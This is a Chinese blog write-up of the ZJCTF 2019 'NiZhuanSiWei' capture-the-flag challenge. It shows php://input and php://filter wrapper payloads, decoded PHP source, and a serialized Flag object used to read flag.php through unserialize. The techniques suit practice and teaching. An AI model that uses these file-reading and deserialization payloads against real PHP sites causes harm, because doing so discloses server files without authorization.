[ZJCTF 2019]NiZhuanSiWei

 

 打开网站发现是php代码,

需要我们get进去三个值,text,file,password.

第一个text

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")

要求text里面的值要等于welcome to the zjctf

这里就可以使用PHP伪协议,利用input伪造内容。

上网查了一下php://input的用法:

 

 

 我们开始构造

http://1.14.71.254:28255/?text=php://input

用post传参 welcome to the zjctf

 

 

 成功传入第一个参数,接下来就是file

它提示了有一个useless.php

试试再用php伪协议打开

file=php://filter/read=convert.base64-encode/resource=useless.php

 

 

 

 

发现出现一串字母,用base64解码

<?php
class Flag{  
	flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file);
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  useless.php
    }  
}  
?>


再想到要传入password,发现它需要反序列化,刚好useless.php里面有一个类。

 

 编码解得O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最后将三个参数一并传入

 

 传入成功,但FLAG没有直接出来,细心一点发现flag在源码里面

 

 总结:

这个题连续用了PHP伪协议和PHP反序列化,要能熟练的运用这两个技巧。

posted @   traveller-2333  阅读(19)  评论(0编辑  收藏  举报
相关博文:
· [SWPUCTF 2021 新生赛]PseudoProtocols
· php反序列化--[SWPUCTF 2021 新生赛]no_wakeup
· [ZJCTF 2019]NiZhuanSiWei
· NSSCTF WEB nizhuansiwei
· [ZJCTF 2019]NiZhuanSiWei 1
阅读排行:
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具
点击右上角即可分享
微信分享提示
AI IDE Trae